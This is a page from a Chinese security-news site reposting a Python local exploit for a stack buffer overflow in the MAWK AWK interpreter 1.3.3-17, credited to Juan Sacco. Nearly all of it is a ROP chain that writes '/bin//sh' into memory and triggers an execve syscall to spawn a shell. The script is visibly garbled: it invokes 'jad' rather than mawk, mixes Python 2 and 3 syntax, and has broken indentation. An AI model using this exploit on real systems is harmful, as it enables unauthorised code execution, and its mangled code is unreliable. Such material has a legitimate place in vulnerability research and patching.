首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MAWK 1.3.3-17 - Local Buffer Overflow
来源:http://exploitpack.com 作者:Sacco 发布时间:2017-07-25  

#!/usr/bin/python
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
#
# Program affected: mawk is an interpreter for the AWK Programming Language. The AWK language is useful
# for manipulation of data files, text retrieval and processing, and for prototyping and experimenting with algorithms.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
import os, subprocess
from struct import pack

 ropchain = "A"*1038 # junk
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '/bin'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe4) # @ .data + 4
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0807b744) # pop eax ; ret
 ropchain += '//sh'
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
 ebx ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
 ropchain += pack('<I', 0x0811abe0) # @ .data
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
 edi ; pop ebp ; ret
 ropchain += pack('<I', 0x0811abe8) # @ .data + 8
 ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x41414141) # padding
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080e571f) # inc eax ; ret
 ropchain += pack('<I', 0x080c861f) # int 0x80

  try:
         print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")
            print("[*] Please wait.. running")
               subprocess.call(["jad", ropchain])
  except OSError as e:
         if e.errno == os.errno.ENOENT:
                    print "MAWK  not found!"
                       else:
                               print "Error executing exploit"
                                  raise


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Internet Explorer -
·ManageEngine Desktop Central 1
·Easy Chat Server User Register
·Razer Synapse 2.20.15.1104 - r
·Metasploit RPC Console Command
·IPFire < 2.19 Update Core 110
·Netscaler SD-WAN 9.1.2.26.5612
·VICIdial 2.9 RC 1 to 2.13 RC1
·Sonicwall < 8.1.0.2-14sv - 'si
·Microsoft Windows - LNK Shortc
·Sonicwall < 8.1.0.6-21sv - 'ge
·MediaCoder 0.8.48.5888 - Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved